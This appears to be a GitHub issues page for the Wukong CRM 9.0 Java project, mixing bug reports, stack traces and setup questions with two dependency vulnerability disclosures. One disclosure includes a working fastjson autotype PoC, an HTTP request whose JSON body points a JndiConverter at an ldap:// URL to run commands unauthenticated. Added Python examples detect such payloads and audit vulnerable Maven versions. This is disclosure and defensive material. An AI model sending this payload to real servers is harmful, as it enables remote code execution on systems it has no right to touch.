wukongopensource / wukongcrm-9.0-java
Wukong CRM: a CRM system with separated front end and back end, built on jfinal + vue + ElementUI
Home Page: http://www.5kcrm.com
License: Other
After studying it for more than a week: Wukong CRM is suitable for using as-is, not for deep customization. The readability of the code and SQL is too poor, many versions are too outdated, and the maintainers no longer keep it up; it cannot be compared with JeecgBoot and ruoyi-vue-pro. Software that is no longer maintained has reached the end of its lifecycle.
https://github.com/jeecgboot/jeecg-boot
https://github.com/YunaiV/ruoyi-vue-pro
The data isolation on the home-page workbench is broken. After adding a schedule item whose backend visibility is set to "only me", everyone in the same department can see it (people in other departments cannot); it should be visible only to myself. Entering through the Schedule menu shows the correct result, but the workbench shows records belonging to other people in the same department.
2019-07-22 13:21:33,245 [ERROR][XNIO-1 task-111][ErpInterceptor.java:49] Response error
com.jfinal.plugin.activerecord.ActiveRecordException: java.lang.IllegalArgumentException: The element in list must be Model or Record.
at com.jfinal.plugin.activerecord.DbPro.batch(DbPro.java:1050)
at com.jfinal.plugin.activerecord.Db.batch(Db.java:617)
at com.kakarote.crm9.erp.crm.service.CrmLeadsService.lambda$deleteByIds$0(CrmLeadsService.java:155)
at com.jfinal.plugin.activerecord.DbPro.tx(DbPro.java:770)
at com.jfinal.plugin.activerecord.DbPro.tx(DbPro.java:807)
at com.jfinal.plugin.activerecord.Db.tx(Db.java:545)
at com.kakarote.crm9.erp.crm.service.CrmLeadsService.deleteByIds(CrmLeadsService.java:153)
at com.kakarote.crm9.erp.crm.service.CrmLeadsService$$EnhancerByCGLIB$$21e3de3c.CGLIB$deleteByIds$7(<generated>)
at com.kakarote.crm9.erp.crm.service.CrmLeadsService$$EnhancerByCGLIB$$21e3de3c$$FastClassByCGLIB$$58167888.invoke(<generated>)
at net.sf.cglib.proxy.MethodProxy.invokeSuper(MethodProxy.java:228)
at com.jfinal.aop.Invocation.invoke(Invocation.java:81)
at com.jfinal.aop.Callback.intercept(Callback.java:68)
at com.kakarote.crm9.erp.crm.service.CrmLeadsService$$EnhancerByCGLIB$$21e3de3c.deleteByIds(<generated>)
at com.kakarote.crm9.erp.crm.controller.CrmLeadsController.deleteByIds(CrmLeadsController.java:100)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at com.jfinal.aop.Invocation.invoke(Invocation.java:74)
at com.kakarote.crm9.erp.crm.common.CrmInterceptor.intercept(CrmInterceptor.java:84)
at com.jfinal.aop.Invocation.invoke(Invocation.java:68)
at com.kakarote.crm9.common.interceptor.AuthInterceptor.intercept(AuthInterceptor.java:39)
at com.jfinal.aop.Invocation.invoke(Invocation.java:68)
at com.kakarote.crm9.common.interceptor.ErpInterceptor.intercept(ErpInterceptor.java:46)
at com.jfinal.aop.Invocation.invoke(Invocation.java:68)
at com.jfinal.core.ActionHandler.handle(ActionHandler.java:89)
at com.jfinal.plugin.druid.DruidStatViewHandler.handle(DruidStatViewHandler.java:81)
at com.jfinal.core.JFinalFilter.doFilter(JFinalFilter.java:89)
at io.undertow.servlet.core.ManagedFilter.doFilter(ManagedFilter.java:61)
at io.undertow.servlet.handlers.FilterHandler$FilterChainImpl.doFilter(FilterHandler.java:131)
at io.undertow.servlet.handlers.FilterHandler.handleRequest(FilterHandler.java:84)
at io.undertow.servlet.handlers.security.ServletSecurityRoleHandler.handleRequest(ServletSecurityRoleHandler.java:62)
at io.undertow.servlet.handlers.ServletChain$1.handleRequest(ServletChain.java:68)
at io.undertow.servlet.handlers.ServletDispatchingHandler.handleRequest(ServletDispatchingHandler.java:36)
at io.undertow.servlet.handlers.security.SSLInformationAssociationHandler.handleRequest(SSLInformationAssociationHandler.java:132)
at io.undertow.servlet.handlers.security.ServletAuthenticationCallHandler.handleRequest(ServletAuthenticationCallHandler.java:57)
at io.undertow.server.handlers.PredicateHandler.handleRequest(PredicateHandler.java:43)
at io.undertow.security.handlers.AbstractConfidentialityHandler.handleRequest(AbstractConfidentialityHandler.java:46)
at io.undertow.servlet.handlers.security.ServletConfidentialityConstraintHandler.handleRequest(ServletConfidentialityConstraintHandler.java:64)
at io.undertow.security.handlers.AuthenticationMechanismsHandler.handleRequest(AuthenticationMechanismsHandler.java:60)
at io.undertow.servlet.handlers.security.CachedAuthenticatedSessionHandler.handleRequest(CachedAuthenticatedSessionHandler.java:77)
at io.undertow.security.handlers.AbstractSecurityContextAssociationHandler.handleRequest(AbstractSecurityContextAssociationHandler.java:43)
at io.undertow.server.handlers.PredicateHandler.handleRequest(PredicateHandler.java:43)
at io.undertow.server.handlers.PredicateHandler.handleRequest(PredicateHandler.java:43)
at io.undertow.servlet.handlers.ServletInitialHandler.handleFirstRequest(ServletInitialHandler.java:292)
at io.undertow.servlet.handlers.ServletInitialHandler.access$100(ServletInitialHandler.java:81)
at io.undertow.servlet.handlers.ServletInitialHandler$2.call(ServletInitialHandler.java:138)
at io.undertow.servlet.handlers.ServletInitialHandler$2.call(ServletInitialHandler.java:135)
at io.undertow.servlet.core.ServletRequestContextThreadSetupAction$1.call(ServletRequestContextThreadSetupAction.java:48)
at io.undertow.servlet.core.ContextClassLoaderSetupAction$1.call(ContextClassLoaderSetupAction.java:43)
at io.undertow.servlet.handlers.ServletInitialHandler.dispatchRequest(ServletInitialHandler.java:272)
at io.undertow.servlet.handlers.ServletInitialHandler.access$000(ServletInitialHandler.java:81)
at io.undertow.servlet.handlers.ServletInitialHandler$1.handleRequest(ServletInitialHandler.java:104)
at io.undertow.server.Connectors.executeRootHandler(Connectors.java:364)
at io.undertow.server.HttpServerExchange$1.run(HttpServerExchange.java:830)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at java.lang.Thread.run(Thread.java:748)
Caused by: java.lang.IllegalArgumentException: The element in list must be Model or Record.
at com.jfinal.plugin.activerecord.DbPro.batch(DbPro.java:973)
at com.jfinal.plugin.activerecord.DbPro.batch(DbPro.java:1048)
... 57 more
Error when moving customers into the public pool in batch
Importing 5000 records makes the query time out
The PHP version does not have this problem
What is the default admin password?
Is the source code of the mobile client available?
Where can the front-end code be downloaded?
I am not clear about the legal issues involved; please clarify.
In version 72crm_9.0.1_20191202, insecure components are used, which can lead to remote command execution. Attackers can attack the system directly without authorization.
An insecure version of the fastjson component is used.
First we found a vulnerability trigger point:
http://localhost:8080/CrmCustomer/queryPageList
The constructor of BasePageRequest is called to process the request. During processing, fastjson's parseObject() method is called first to parse the JSON string into a Java bean. Because of the deserialization vulnerability in this version of fastjson, an attacker only needs to visit /CrmCustomer/queryPageList and submit a malicious JSON string to trigger the vulnerability.
There are many attack modes for version 1.2.54; only one of them is shown below:
This attack requires the xbean jar package to be present on the classpath and AutoType to be enabled.
Start the attack
POC:
POST /CrmCustomer/queryPageList HTTP/1.1
Host: localhost:8080
Content-Length: 115
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://ip:port/Basic/Command/calc"}
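The report above shows the request shape that reaches fastjson's parseObject(): a JSON body carrying an "@type" key and a JNDI URL. The following is an added example, not code from the report or from the project, of a request-body check a practitioner could run at a reverse proxy or over captured request logs to spot that shape before it reaches the endpoint. It walks the decoded JSON so that escaped variants of the key (for example "\u0040type") are caught after decoding, and falls back to a textual check when the body is not strict JSON, since fastjson is more lenient than Python's json module. The sample bodies are constructed; the PoC body is copied from the report, the others are assumed inputs, and the list of JNDI schemes beyond ldap:// and rmi:// is an assumption.

```python
import json
import re

# Schemes a JNDI-resolving gadget (such as the JndiConverter in the PoC above) would
# follow. ldap:// and rmi:// are the common ones; the rest are added as an assumption.
JNDI_SCHEMES = ("ldap://", "ldaps://", "rmi://", "iiop://", "dns://")

# Textual fallback for bodies that are not strict JSON: a quoted @type key, with the
# '@' either literal or written as the \u0040 escape, followed by a colon.
RAW_TYPE_KEY = re.compile(r"""['"](?:@|\\u0040)type['"]\s*:""", re.IGNORECASE)

# Constructed sample bodies. "poc" is the request body from the report above;
# the others are assumed inputs for a /CrmCustomer/queryPageList-style endpoint.
SAMPLE_BODIES = {
    "poc": '{"@type":"org.apache.xbean.propertyeditor.JndiConverter",'
           '"AsText":"ldap://ip:port/Basic/Command/calc"}',
    "benign": '{"page":1,"limit":15,"search":"acme"}',
    # Same key written with a unicode escape; json.loads decodes it to "@type".
    "escaped": '{"\\u0040type":"org.apache.xbean.propertyeditor.JndiConverter",'
               '"AsText":"rmi://127.0.0.1:1099/Exploit"}',
    # @type hidden one level down, inside a field the endpoint does accept.
    "nested": '{"page":1,"search":{"@type":"com.example.Constructed"}}',
    # Single-quoted keys: json.loads rejects this, so only the raw check applies.
    "malformed": "{'@type':'org.apache.xbean.propertyeditor.JndiConverter'}",
}


def _walk(node, path, hits):
    """Recursively collect @type keys and JNDI-looking string values with their JSON path."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}" if path else key
            if key == "@type":
                hits.append({"kind": "autotype", "path": child, "value": str(value)})
            _walk(value, child, hits)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            _walk(item, f"{path}[{i}]", hits)
    elif isinstance(node, str):
        if node.lower().startswith(JNDI_SCHEMES):
            hits.append({"kind": "jndi", "path": path, "value": node})


def find_autotype_payloads(body: str) -> list:
    """Return findings for one JSON request body.

    Each finding is {"kind": "autotype" | "jndi" | "raw", "path": ..., "value": ...}.
    An empty list means nothing suspicious was seen.
    """
    try:
        parsed = json.loads(body)
    except ValueError:
        # Not strict JSON: a lenient server-side parser may still accept it, so
        # do a textual check rather than silently passing the body through.
        if RAW_TYPE_KEY.search(body):
            return [{"kind": "raw", "path": "", "value": body[:80]}]
        return []
    hits = []
    _walk(parsed, "", hits)
    return hits


def is_suspicious(body: str) -> bool:
    """True when the body carries an @type key or a JNDI URL anywhere."""
    return bool(find_autotype_payloads(body))


if __name__ == "__main__":
    for name, body in SAMPLE_BODIES.items():
        print(name, "->", find_autotype_payloads(body))
```

The check flags any "@type" key rather than only known gadget class names, on the assumption that a paging request like the one above has no legitimate use for fastjson's type hint; on an endpoint that does rely on it, the allow-list of class names would have to be applied at the "autotype" findings instead.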
Advanced filter: the dropdown list has no values
Version V9.2.3.191220
In the backend settings, the customer-management role's data permission is set to "own data only", but the business intelligence templates show statistics for all data of everyone in the corresponding department.
If I want to change this myself, do I only need to change the front end?
Caused by: com.mysql.jdbc.MysqlDataTruncation: Data truncation: BIGINT UNSIGNED value is out of range in '((to_days(`crm9`.`a`.`update_time`) + cast((select `crm9`.`72crm_admin_config`.`value` from `crm9`.`72crm_admin_config` where (`crm9`.`72crm_admin_config`.`name` = 'customerPoolSettingFollowupDays')) as unsigned)) - to_days(now()))'
at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3971)
at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3909)
at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:873)
at com.mysql.jdbc.MysqlIO.nextRow(MysqlIO.java:1996)
at com.mysql.jdbc.MysqlIO.readSingleRowSet(MysqlIO.java:3410)
at com.mysql.jdbc.MysqlIO.getResultSet(MysqlIO.java:470)
at com.mysql.jdbc.MysqlIO.readResultsForQueryOrUpdate(MysqlIO.java:3112)
at com.mysql.jdbc.MysqlIO.readAllResults(MysqlIO.java:2341)
at com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:2736)
at com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2487)
at com.mysql.jdbc.PreparedStatement.executeInternal(PreparedStatement.java:1858)
at com.mysql.jdbc.PreparedStatement.executeQuery(PreparedStatement.java:1966)
at com.alibaba.druid.filter.FilterChainImpl.preparedStatement_executeQuery(FilterChainImpl.java:2714)
at com.alibaba.druid.wall.WallFilter.preparedStatement_executeQuery(WallFilter.java:622)
at com.alibaba.druid.filter.FilterChainImpl.preparedStatement_executeQuery(FilterChainImpl.java:2711)
at com.alibaba.druid.filter.FilterEventAdapter.preparedStatement_executeQuery(FilterEventAdapter.java:465)
at com.alibaba.druid.filter.FilterChainImpl.preparedStatement_executeQuery(FilterChainImpl.java:2711)
at com.alibaba.druid.proxy.jdbc.PreparedStatementProxyImpl.executeQuery(PreparedStatementProxyImpl.java:145)
at com.alibaba.druid.pool.DruidPooledPreparedStatement.executeQuery(DruidPooledPreparedStatement.java:227)
at com.jfinal.plugin.activerecord.DbPro.find(DbPro.java:314)
at com.jfinal.plugin.activerecord.DbPro.doPaginateByFullSql(DbPro.java:578)
at com.jfinal.plugin.activerecord.DbPro.doPaginate(DbPro.java:535)
Where can the front-end code be downloaded?
Hi, in 72crm-9.0-JAVA there is a dependency, org.apache.poi:poi-ooxml:3.17, that calls a risky method.
The version range affected by this CVE is [,4.1.0).
After further analysis, the main API called in this project is <org.apache.poi.xssf.streaming.SXSSFCell: java.lang.String getStringCellValue()>
Risk method repair link : GitHub
CVE Bug Invocation Path--
Path Length : 4
<org.apache.poi.xssf.streaming.SXSSFCell: java.lang.String getStringCellValue()>
at <org.apache.poi.xssf.streaming.SXSSFCell: org.apache.poi.ss.usermodel.RichTextString getRichStringCellValue()> (org.apache.poi.xssf.streaming.SXSSFCell.java:[453]) in /.m2/repository/org/apache/poi/poi-ooxml/3.17/poi-ooxml-3.17.jar
at <org.apache.poi.xssf.streaming.SXSSFCell: java.lang.String toString()> (org.apache.poi.xssf.streaming.SXSSFCell.java:[768]) in /.m2/repository/org/apache/poi/poi-ooxml/3.17/poi-ooxml-3.17.jar
at <com.kakarote.crm9.erp.crm.service.CrmLeadsService: com.kakarote.crm9.utils.R uploadExcel(com.jfinal.upload.UploadFile,java.lang.Integer,java.lang.Integer)> (com.kakarote.crm9.erp.crm.service.CrmLeadsService.java:[393]) in /detect/unzip/72crm-9.0-JAVA-9.0.1_20191202/target/classes
Dependency tree--
[INFO] com.kakarote:crm9:jar:1.3.3
[INFO] +- com.jfinal:jfinal-undertow:jar:1.9:compile
[INFO] | +- io.undertow:undertow-core:jar:2.0.25.Final:compile
[INFO] | | +- org.jboss.logging:jboss-logging:jar:3.4.0.Final:compile
[INFO] | | +- org.jboss.xnio:xnio-api:jar:3.3.8.Final:compile
[INFO] | | \- org.jboss.xnio:xnio-nio:jar:3.3.8.Final:runtime
[INFO] | +- io.undertow:undertow-servlet:jar:2.0.25.Final:compile
[INFO] | \- javax.servlet:javax.servlet-api:jar:4.0.1:compile
[INFO] +- com.jfinal:jfinal:jar:3.8:compile
[INFO] +- cglib:cglib-nodep:jar:3.2.5:compile
[INFO] +- com.jfinal:cos:jar:2019.8:compile
[INFO] +- it.sauronsoftware.cron4j:cron4j:jar:2.2.5:compile
[INFO] +- redis.clients:jedis:jar:2.9.0:compile
[INFO] | \- org.apache.commons:commons-pool2:jar:2.4.2:compile
[INFO] +- de.ruedigermoeller:fst:jar:2.50:compile
[INFO] | +- com.fasterxml.jackson.core:jackson-core:jar:2.8.8:compile
[INFO] | +- org.javassist:javassist:jar:3.21.0-GA:compile
[INFO] | +- org.objenesis:objenesis:jar:2.5.1:compile
[INFO] | \- com.cedarsoftware:java-util:jar:1.9.0:compile
[INFO] | +- commons-logging:commons-logging:jar:1.1.1:compile
[INFO] | \- com.cedarsoftware:json-io:jar:2.5.1:compile
[INFO] +- org.slf4j:slf4j-nop:jar:1.7.25:compile
[INFO] | \- org.slf4j:slf4j-api:jar:1.7.25:compile
[INFO] +- log4j:log4j:jar:1.2.16:compile
[INFO] +- mysql:mysql-connector-java:jar:5.1.44:compile
[INFO] +- com.alibaba:druid:jar:1.0.29:compile
[INFO] | +- com.alibaba:jconsole:jar:1.8.0:system
[INFO] | \- com.alibaba:tools:jar:1.8.0:system
[INFO] +- com.alibaba:fastjson:jar:1.2.54:compile
[INFO] +- cn.hutool:hutool-all:jar:4.4.0:compile
[INFO] +- org.apache.poi:poi-ooxml:jar:3.17:compile
[INFO] | +- org.apache.poi:poi:jar:3.17:compile
[INFO] | | +- commons-codec:commons-codec:jar:1.10:compile
[INFO] | | \- org.apache.commons:commons-collections4:jar:4.1:compile
[INFO] | +- org.apache.poi:poi-ooxml-schemas:jar:3.17:compile
[INFO] | | \- org.apache.xmlbeans:xmlbeans:jar:2.6.0:compile
[INFO] | | \- stax:stax-api:jar:1.0.1:compile
[INFO] | \- com.github.virtuald:curvesapi:jar:1.04:compile
[INFO] +- com.aliyun:aliyun-java-sdk-core:jar:4.0.6:compile
[INFO] | +- com.google.code.gson:gson:jar:2.8.2:compile
[INFO] | +- org.apache.httpcomponents:httpclient:jar:4.5.3:compile
[INFO] | | \- org.apache.httpcomponents:httpcore:jar:4.4.6:compile
[INFO] | +- javax.xml.bind:jaxb-api:jar:2.1:compile
[INFO] | | \- javax.xml.stream:stax-api:jar:1.0-2:compile
[INFO] | +- com.sun.xml.bind:jaxb-core:jar:2.1.14:compile
[INFO] | +- com.sun.xml.bind:jaxb-impl:jar:2.1:compile
[INFO] | \- javax.activation:activation:jar:1.1.1:compile
[INFO] +- com.aliyun:aliyun-java-sdk-dysmsapi:jar:1.1.0:compile
[INFO] \- com.github.ben-manes.caffeine:caffeine:jar:2.6.2:compile
Suggested solutions:
Update dependency version
Thank you very much.
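Both dependency reports on this page (the fastjson one earlier and the poi-ooxml one above) come down to reading the `mvn dependency:tree` output and comparing a coordinate's version against an affected range. The following is an added example, not code from either report or from the project, of a small auditor that parses that output, applies Maven-style version ranges, and reports whether a flagged artifact is a direct dependency (fix it in the pom) or transitive (override it through dependencyManagement). The poi-ooxml range [,4.1.0) is the one stated in the report above; the fastjson threshold of 1.2.83 is an assumption taken from upstream fastjson advisories, since the earlier report only says 1.2.54 is insecure. The tree excerpt is constructed from a few of the lines above, and the version comparison is a simplification of Maven's (it does not treat 1.2 and 1.2.0 as equal).

```python
import re

# Rules keyed by groupId:artifactId -> (Maven version range, note).
# poi-ooxml: range stated in the report above.
# fastjson: ASSUMED fix threshold from upstream advisories; this page only says 1.2.54 is insecure.
RULES = {
    "org.apache.poi:poi-ooxml": ("[,4.1.0)", "SXSSFCell.getStringCellValue() path, per report"),
    "com.alibaba:fastjson": ("[,1.2.83)", "autotype deserialization (assumed fix threshold)"),
}

# One `mvn dependency:tree` line: optional tree prefix, optional edge (+- or \-),
# then group:artifact:type:version[:scope]. The root line has no edge.
TREE_LINE = re.compile(
    r"^\[INFO\]\s*(?P<prefix>[|\s]*)(?P<edge>[+\\]-\s+)?"
    r"(?P<group>[\w.\-]+):(?P<artifact>[\w.\-]+):(?P<type>[\w\-]+)"
    r":(?P<version>[\w.\-]+)(?::(?P<scope>\w+))?\s*$"
)

# Constructed excerpt mirroring lines from the dependency tree above.
SAMPLE_TREE = """\
[INFO] com.kakarote:crm9:jar:1.3.3
[INFO] +- com.jfinal:jfinal:jar:3.8:compile
[INFO] +- com.alibaba:fastjson:jar:1.2.54:compile
[INFO] +- org.apache.poi:poi-ooxml:jar:3.17:compile
[INFO] |  +- org.apache.poi:poi:jar:3.17:compile
[INFO] |  |  \\- org.apache.commons:commons-collections4:jar:4.1:compile
[INFO] |  \\- org.apache.xmlbeans:xmlbeans:jar:2.6.0:compile
[INFO] \\- com.github.ben-manes.caffeine:caffeine:jar:2.6.2:compile
"""


def parse_tree(text):
    """Return one dict per dependency line; 'direct' is True for first-level children."""
    deps = []
    for line in text.splitlines():
        m = TREE_LINE.match(line.strip())
        if not m:
            continue  # plugin banners and blank lines
        d = m.groupdict()
        d["direct"] = d["edge"] is not None and d["prefix"].strip() == ""
        deps.append(d)
    return deps


def _vkey(version):
    # Numeric parts compare as ints, qualifiers (Final, GA) as strings; the
    # leading tag keeps int and str from being compared against each other.
    return [(0, int(p)) if p.isdigit() else (1, p) for p in re.split(r"[.\-]", version)]


def _cmp(a, b):
    ka, kb = _vkey(a), _vkey(b)
    return (ka > kb) - (ka < kb)


def in_range(version, spec):
    """True if version lies inside a Maven range such as [,4.1.0) or [1.0,2.0]."""
    m = re.fullmatch(r"([\[(])\s*([^,]*?)\s*,\s*([^\])]*?)\s*([\])])", spec)
    if not m:
        raise ValueError(f"unsupported range: {spec}")
    lo_inc, lo, hi, hi_inc = m.group(1) == "[", m.group(2), m.group(3), m.group(4) == "]"
    if lo:
        c = _cmp(version, lo)
        if c < 0 or (c == 0 and not lo_inc):
            return False
    if hi:
        c = _cmp(version, hi)
        if c > 0 or (c == 0 and not hi_inc):
            return False
    return True


def audit(tree_text, rules=RULES):
    """Return the dependencies whose version falls inside a rule's affected range."""
    findings = []
    for dep in parse_tree(tree_text):
        rule = rules.get(f"{dep['group']}:{dep['artifact']}")
        if rule and in_range(dep["version"], rule[0]):
            findings.append({**dep, "range": rule[0], "note": rule[1]})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_TREE):
        where = "direct: bump in pom.xml" if f["direct"] else "transitive: pin via dependencyManagement"
        print(f"{f['group']}:{f['artifact']}:{f['version']} in {f['range']} ({where}) - {f['note']}")
```

Run it as `mvn dependency:tree | python audit.py` after swapping SAMPLE_TREE for stdin; both flagged artifacts in the tree above are direct dependencies, so the fix is a version bump in the project's own pom rather than an override of something pulled in by jfinal or aliyun-java-sdk-core.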
http://10.195.182.29:8080/crm/index.html#/login?redirect=%2Fworkbench%2Findex
On the login page, after entering the username and password and clicking Login, it reports "Network request failed, please try again later".
http://10.195.182.29:8080/api/login
Request method: POST
Remote address: 10.195.182.29:8080
Status code: 404
Version: HTTP/1.1
Is there something I have not configured correctly?